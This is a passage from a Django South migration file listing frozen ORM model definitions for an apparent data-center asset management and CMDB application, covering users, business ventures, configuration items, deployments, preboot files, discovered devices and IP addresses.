'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'business.businesssegment': {
'Meta': {'object_name': 'BusinessSegment'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.department': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Department'},
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.profitcenter': {
'Meta': {'object_name': 'ProfitCenter'},
'description': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'business.venture': {
'Meta': {'ordering': "(u'parent__symbol', u'symbol')", 'unique_together': "((u'parent', u'symbol'),)", 'object_name': 'Venture'},
'business_segment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.BusinessSegment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']", 'null': 'True', 'blank': 'True'}),
'department': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Department']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_infrastructure': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.Venture']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'profit_center': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.ProfitCenter']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'show_in_ralph': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symbol': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'business.venturerole': {
'Meta': {'ordering': "(u'parent__name', u'name')", 'unique_together': "((u'name', u'venture'),)", 'object_name': 'VentureRole'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '75'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "u'child_set'", 'null': 'True', 'blank': 'True', 'to': "orm['business.VentureRole']"}),
'path': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']"})
},
'cmdb.ci': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CI'},
'added_manually': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'business_service': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CILayer']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'owners': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIOwner']", 'through': "orm['cmdb.CIOwnership']", 'symmetrical': 'False'}),
'pci_scope': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'relations': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CI']", 'through': "orm['cmdb.CIRelation']", 'symmetrical': 'False'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'technical_service': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIType']"}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'zabbix_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'})
},
'cmdb.cilayer': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'CILayer'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'connected_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIType']", 'symmetrical': 'False', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'True', u'default': 'None', 'null': 'True', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cmdb.ciowner': {
'Meta': {'object_name': 'CIOwner'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'profile': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['account.Profile']", 'unique': 'True'})
},
'cmdb.ciownership': {
'Meta': {'object_name': 'CIOwnership'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIOwner']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'cmdb.cirelation': {
'Meta': {'unique_together': "((u'parent', u'child', u'type'),)", 'object_name': 'CIRelation'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'child': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child'", 'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'parent'", 'to': "orm['cmdb.CI']"}),
'readonly': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'})
},
'cmdb.citype': {
'Meta': {'object_name': 'CIType'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'icon_class': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'deployment.archiveddeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'ArchivedDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'Deployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.Device']"}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'done_plugins': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_running': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mac': (u'lck.django.common.models.MACAddressField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', 'null': 'False', 'db_index': 'False'}),
'mass_deployment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['deployment.MassDeployment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'preboot': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['deployment.Preboot']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'status_lastchanged': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL'})
},
'deployment.deploymentpoll': {
'Meta': {'object_name': 'DeploymentPoll'},
'checked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'deployment.massdeployment': {
'Meta': {'ordering': "(u'-created',)", 'object_name': 'MassDeployment'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'generated_csv': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_done': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'})
},
'deployment.preboot': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Preboot'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'files': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['deployment.PrebootFile']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'deployment.prebootfile': {
'Meta': {'object_name': 'PrebootFile'},
'description': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ftype': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '101', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'raw_config': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'discovery.connection': {
'Meta': {'object_name': 'Connection'},
'connection_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'inbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"}),
'outbound': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'outbound_connections'", 'on_delete': 'models.PROTECT', 'to': "orm['discovery.Device']"})
},
'discovery.datacenter': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DataCenter'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.deprecationkind': {
'Meta': {'object_name': 'DeprecationKind'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'months': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
'discovery.device': {
'Meta': {'object_name': 'Device'},
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'boot_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'cached_cost': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'cached_price': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'chassis_position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'connections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['discovery.Device']", 'through': "orm['discovery.Connection']", 'symmetrical': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dc': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'deprecation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deprecation_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.DeprecationKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'device_environment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'diag_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hard_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'logical_parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'logicalchild_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'management': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'managed_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.IPAddress']", 'blank': 'True', 'null': 'True'}),
'margin_kind': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.MarginKind']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mgmt_firmware': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'model': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'device_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.DeviceModel']", 'blank': 'True', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name2': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['discovery.Device']", 'blank': 'True', 'null': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'purchase_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'rack': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['cmdb.CI']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'sn': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'support_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'support_kind': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'uptime_seconds': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'uptime_timestamp': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'venture_role': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['business.VentureRole']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'warranty_expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.devicemodel': {
'Meta': {'object_name': 'DeviceModel'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'chassis_size': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_save_priority': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'save_priorities': ('django.db.models.fields.TextField', [], {'default': "u''"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '401'})
},
'discovery.discoveryqueue': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'DiscoveryQueue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'discovery.environment': {
'Meta': {'ordering': "(u'name',)", 'object_name': 'Environment'},
'data_center': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DataCenter']"}),
'domain': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hosts_naming_template': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'next_server': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '32', 'blank': 'True'}),
'queue': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['discovery.DiscoveryQueue']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'remarks': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'discovery.ipaddress': {
'Meta': {'object_name': 'IPAddress'},
'address': ('django.db.models.fields.IPAddressField', [], {'default': 'None', 'max_length': '15', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dead_ping_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Device']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'dns_info': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'http_family': ('django.db.models.fields.TextField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_buried': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_management': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_plugins': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'last_puppet': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['discovery.Network']", 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'scan_summary': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['scan.ScanSummary']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'snmp_community': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'snmp_name': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
